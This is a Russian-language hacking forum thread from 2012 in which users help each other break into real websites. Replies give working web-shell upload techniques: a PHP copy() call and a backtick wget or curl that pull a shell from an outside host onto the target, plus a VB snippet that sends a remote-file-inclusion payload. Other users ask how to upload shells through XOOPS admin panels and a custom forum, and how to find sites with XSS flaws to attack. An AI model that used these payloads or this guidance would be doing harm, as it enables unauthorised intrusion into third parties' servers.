09.01.2012, 00:18
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Skipp
Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.
4, можно ставить больше, сколько угодно (в пределах макс длины урл), ибо дальше корня не пойти
Сообщение от shadowrun
/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php
не?
это когда pg.php стал папкой?
|
|
|
09.01.2012, 00:18
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
С нами:
8421303
Репутация:
0
|
|
Да, понятно.
|
|
|
|
09.01.2012, 00:45
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417383
Репутация:
0
|
|
Нашел уязвимость, отсылаю пост запрос с содержимым:
$modi=
все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h
Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:
file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';
только как избавится от кавычек?
|
|
|
|
09.01.2012, 00:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от ocheretko
Нашел уязвимость, отсылаю пост запрос с содержимым:
$modi=
все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h
Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:
file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';
только как избавится от кавычек?
copy($_GET[a],$_GET );
через гет отправь
a=http://site.ru/shell.txt&b=/var/www/html/shell.php
если shell_exec не отключено, то можно и print(`wget http://site.ru/shell.php`); или curl
|
|
|
|
09.01.2012, 00:48
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от NZT
stepashka_
, скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или
Tor достаточно для этих сайтов?
Поставь себе на комп бажную цмс и тренируйся
Или купи vpn.
|
|
|
|
09.01.2012, 01:19
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417383
Репутация:
0
|
|
Благодарю, все получилось, +1 прием в голову
PHP код:
[COLOR="#000000"]Dim url as String = "example.com"
Dim postdata As String = "modi=[COLOR="#0000BB"][/COLOR]"
openurl = "http://" & url & "/scriptname.php?scdir=/var/chroot/site/readme.php&ldir=http://yousite.ru/1.txt"[/COLOR]
|
|
|
|
09.01.2012, 09:53
|
|
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами:
7561046
Репутация:
0
|
|
Сообщение от stepashka_
Поставь себе на комп бажную цмс и тренируйся
Или купи vpn.
Насчет быжных сайтов на компе так я хотел бы тренироваться в интернете , так забавней )
А насчет впн , так я хотел бы пока обойтись простыми и не популярными сайтами для тренировки чтобы не нужно было сильно прятаться и заодно бесплатно , или для хорошего опыта желательно поставить впн и потренироваться имено на серьёзных сайтах. Что посоветуешь? Я новичок и хочу научиться , поэтому я обращяюсь за советом поскольку ничего не знаю )
Спасибо.
И как найти простые сайты с xss ? Просто лазить по разным сайтам и искать или можно как то через гугл найти кучу простых сайтов а потом в них уже искать уязвимость?
|
|
|
|
09.01.2012, 13:05
|
|
Участник форума
Регистрация: 10.07.2011
Сообщений: 252
С нами:
7811606
Репутация:
21
|
|
как залить шелл в xoops через админку?
|
|
|
|
09.01.2012, 14:33
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от DyukiN
как залить шелл в xoops через админку?
/showpost.php?p=2962252&postcount=4
|
|
|
|
09.01.2012, 15:31
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
